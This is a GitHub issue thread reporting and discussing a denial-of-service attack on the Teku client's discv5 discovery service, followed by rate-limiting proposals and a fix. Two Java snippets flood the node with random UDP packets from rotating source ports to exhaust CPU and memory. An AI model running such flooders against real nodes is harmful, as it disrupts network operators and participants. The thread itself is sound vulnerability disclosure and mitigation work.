### ISSUE TITLE
Another discovery attack

### ISSUE THREAD

**Issue by Nashatyrev** [Consensys-Incorporated/teku#2771]
### Description
Continuation to #2648 and https://github.com/ethereum/public-attacknets/issues/16: 
Extensively sending well formed `RandomPackets` with random data results in high CPU and GC pressure to Teku instance:

Below only the discovery attack loads CPU:
![изображение](https://user-images.githubusercontent.com/8173857/92597754-83587600-f2b0-11ea-908f-7eca2e308e0f.png)

Additionally it causes mem leak in Discovery: in unlimitly populates `NodeToIdSession.recentSessions` map: https://github.com/PegaSysEng/discovery/blob/b45fe1495b8e91c7ec2dfe806bca8f979f290435/src/main/java/org/ethereum/beacon/discovery/pipeline/handler/NodeIdToSession.java#L46 

### Attack code: 
```java
  void dos() throws Exception {
    String host = "localhost";
    int port = 9001; //Random Port

    InetAddress address = InetAddress.getByName(host);

    System.out.println("Attacking...");

    for (int j = 0; j < 100000; j++) {
      DatagramSocket dsocket = null;
      int srcPort = 10000 + (j % 50000);
      try {
        dsocket = new DatagramSocket(srcPort);
        for (int i = 0; i < 1000; i++) {

          RandomPacket randomPacket =
              RandomPacket.create(Bytes32.random(), Bytes.random(12), Bytes.random(44));

          Bytes randomPacketBytes = randomPacket.getBytes();
  //        Bytes randomPacketBytes = Bytes.random(88);
          DatagramPacket packet =
              new DatagramPacket(
                  randomPacketBytes.toArrayUnsafe(), randomPacketBytes.size(), address, port);
          dsocket.send(packet);
        }
        dsocket.close();
      } catch (Exception e) {
        System.out.println("Err opening socket on port " + srcPort + ": " + e);
      }
      Thread.sleep(1);
      System.out.println("Sent from " + srcPort);
    }
    System.out.println("Completed.");
  }

```

**Comment by Nashatyrev** [comment]
CC @jrhea

**Comment by Nashatyrev** [comment]
BTW there is a remark in [discv5 spec](https://github.com/ethereum/devp2p/blob/master/discv5/discv5-wire.md#udp-communication): 
> Since low-latency communication is expected, implementations should place short timeouts on request/response interactions. Good timeout values are 500ms for a single request/response and 1s for the handshake.

But I don't believe that jvm implementation does anything with this respect

**Comment by Nashatyrev** [comment]
My thought is that forming a Discv5 packet is anyway cheaper than its processing so probably it make sense to add a handler which limits number of packets. E.g. `N` msg/sec for remote `IP:port` and `M` msg/sec for remote `IP` (`N <= M`) (or just `IP` for simplicity)

**Comment by jrhea** [comment]
> My thought is that forming a Discv5 packet is anyway cheaper than its processing so probably it make sense to add a handler which limits number of packets. E.g. `N` msg/sec for remote `IP:port` and `M` msg/sec for remote `IP` (`N <= M`) (or just `IP` for simplicity)

I would suggest not limit by IP since this is easy to spoof and could make teku vulnerable to other kinds of attacks.  That being said, I do support the idea of rate limiting - this was one of the strategies that @mkalinin and I suggested (to mitigate the DoS attacks that i disclosed privately) in today's networking call.  I recommend rate limiting the processing of unsolicited messages to some number N per second.  Once it that amount is reached, I think the safest thing to do is to pseudo randomly sample the messages that you process.

**Comment by mkalinin** [comment]
I agree with @jrhea. It would be enough to limit all incoming discovery traffic to mitigate DoS. I think there is no need in randomizing the queue, requests over the limit should be discarded instead and when limiting counter is reset client should continue processing; it looks good enough it terms of randomness in this particular case.

So, it's gonna be pretty simple throttle mechanism that sets a flag if counter hits the limit and resets it when new request goes beyond some interval (interval could be less than a second actually).

**Comment by cemozerr** [comment]
I've been trying to reproduce this attack in Discv5.1. I've modified the code attached to the issue a bit to make it work with Discv5.1:
```
void dos() throws Exception {
    String host = "localhost";
    int port = 9000; //Random Port
    long pid = ProcessHandle.current().pid();
    System.out.println("process id: " + pid);

    InetAddress address = InetAddress.getByName(host);

    System.out.println("Attacking...");

    Header<OrdinaryMessagePacket.OrdinaryAuthData> header =
            Header.createOrdinaryHeader(Bytes32.random(), Bytes12.wrap(Bytes.random(12)));
    OrdinaryMessagePacket randomPacket = OrdinaryMessagePacket.createRandom(header, Bytes.random(44));

    RawPacket packet =
            RawPacketImpl.create(
                    Bytes16.wrap(Bytes.random(16)),
                    randomPacket,
                    Bytes16.wrap(Bytes32.fromHexString("0xa19b56e35bec3835a3e2e6b8a9c343f1e8ae7f64dc12350bd254be04db7b8dc0").slice(0, 16)));

    DatagramPacket datagramPacket = new DatagramPacket(
            packet.getBytes().toArrayUnsafe(),
            packet.getBytes().size(),
            address,
            port
    );

    for (int j = 0; j < 100000; j++) {
      DatagramSocket dsocket = null;
      int srcPort = 10000 + (j % 50000);
      try {
        dsocket = new DatagramSocket(srcPort);
        for (int i = 0; i < 1000; i++) {

          dsocket.send(datagramPacket);
        }
        dsocket.close();
      } catch (Exception e) {
        System.out.println("Err opening socket on port " + srcPort + ": " + e);
      }
      Thread.sleep(5);
      System.out.println("Sent from " + srcPort);
    }
    System.out.println("Completed.");
  }
```
I've repeated the attack with sleep durations of 1, 5, and 10 milliseconds. I've also tried creating a different random packet for each packet sent. 

I was unable to make the discovery process use more CPU than the attacker in any of these scenarios.
The highest memory leak I could produce was about 1.5 MB / minute.

**Comment by Nashatyrev** [comment]
@cemozerr did you see what's leaking?

**Comment by cemozerr** [comment]
Closed via #3437
